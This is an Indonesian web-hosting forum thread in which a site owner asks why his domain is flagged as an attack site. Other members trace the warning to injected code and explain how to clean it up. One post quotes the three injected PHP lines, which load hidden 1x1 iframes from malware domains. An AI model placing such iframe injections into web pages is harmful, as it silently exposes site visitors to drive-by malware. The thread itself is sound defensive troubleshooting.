Web Client kena Reported Attack site!

Discussion in 'Masalah Teknik dan Keamanan' started by Mahavikri, 25 Apr 2009.

Thread Status:
Not open for further replies.
  1. Mahavikri

    Mahavikri Apprentice 1.0

    Messages:
    344
    Likes Received:
    31
    Trophy Points:
    28
    nanya lage...

    domain: http://karawang.info/

    kira-kira kenapa yah? cara biar normal kembali gimana tuh?

    udah coba di scan pake clamav ga kena virus sih:
    :confused: :confused:
     
  2. PusatHosting

    PusatHosting Hosting Guru Web Hosting

    Messages:
    3,334
    Likes Received:
    326
    Trophy Points:
    83
  3. ruangweb

    ruangweb (Ret) Community Leader

    Messages:
    688
    Likes Received:
    6
    Trophy Points:
    18
    Ini pesan yg nongol kalo di-klik tombol "Why was this site blocked?" pd firefox (url http://safebrowsing.clients.google....t=Firefox&hl=en-US&site=http://karawang.info/ )
     
  4. susan

    susan Apprentice 1.0

    Messages:
    287
    Likes Received:
    37
    Trophy Points:
    28
  5. Bforce

    Bforce _ DWH Admin Web Hosting (Company)

    Messages:
    1,420
    Likes Received:
    305
    Trophy Points:
    83
    Situs tsb mengandung 2 domain yg telah di-ban, di 3 iframe hasil injeksi (di footer):
    internetcountercheck[dot]com
    goooogleadsence[dot]biz

    Domain Name: INTERNETCOUNTERCHECK[dot]COM
    Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
    Name Server: NS1.SUSPENDED-DOMAIN.COM
    Name Server: NS2.SUSPENDED-DOMAIN.COM

    Domain Name: GOOOOGLEADSENCE[dot]BIZ
    Domain ID: D29931447-BIZ
    Sponsoring Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
    Name Server: NS1.SUSPENDED-DOMAIN.COM
    Name Server: NS2.SUSPENDED-DOMAIN.COM
     
  6. Mahavikri

    Mahavikri Apprentice 1.0

    Messages:
    344
    Likes Received:
    31
    Trophy Points:
    28
    iya ketemu nih di file index.php bagian bawah mulai pake echo" ....
    tapi kok masih muncul bos... :confused:
     
  7. am3n

    am3n Apprentice 1.0

    Messages:
    384
    Likes Received:
    2
    Trophy Points:
    18
    I have same case. klo script injeksi sudah dibuang nge-whitelist situs itu dari google gimana ya ?
     
  8. ruangweb

    ruangweb (Ret) Community Leader

    Messages:
    688
    Likes Received:
    6
    Trophy Points:
    18
    info& link-nya ada di paling bawah
    http://www.google.com/support/webmasters/bin/answer.py?answer=45432
     
  9. am3n

    am3n Apprentice 1.0

    Messages:
    384
    Likes Received:
    2
    Trophy Points:
    18
    Makasih Ruangweb atas petunjuk, maaf kecapekan habis hapus 3 baris ini secara manual di banyak file

    Code:
    echo "<iframe src=\"http://thedeadpit.com/?click=5187687\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    
    echo "<iframe src=\"http://internetcountercheck.com/?click=5988250\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    
    echo "<iframe src=\"http://goooogleadsence.biz/?click=19CD29\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
    btw Mahavikri, coba deh cari nya pake command ini

    Code:
    grep -R goooogleadsence * > infected
    di folder public_html, trus lihat file infected. karena disitus ini, 3 baris itu nempel dibanyak file :(

    yang bikin aneh adalah bagaimana caranya bisa banyak file di tempelin 3 baris code tsb, pdhal file itu tidak world-writeable loh.
     
  10. am3n

    am3n Apprentice 1.0

    Messages:
    384
    Likes Received:
    2
    Trophy Points:
    18
    situs klien pake postnuke, lihat di about/readme nya tahun 2005, yikes..
    mas Mahavikri, karawang.info pake script apa?
     
Loading...
Thread Status:
Not open for further replies.

Share This Page

Loading...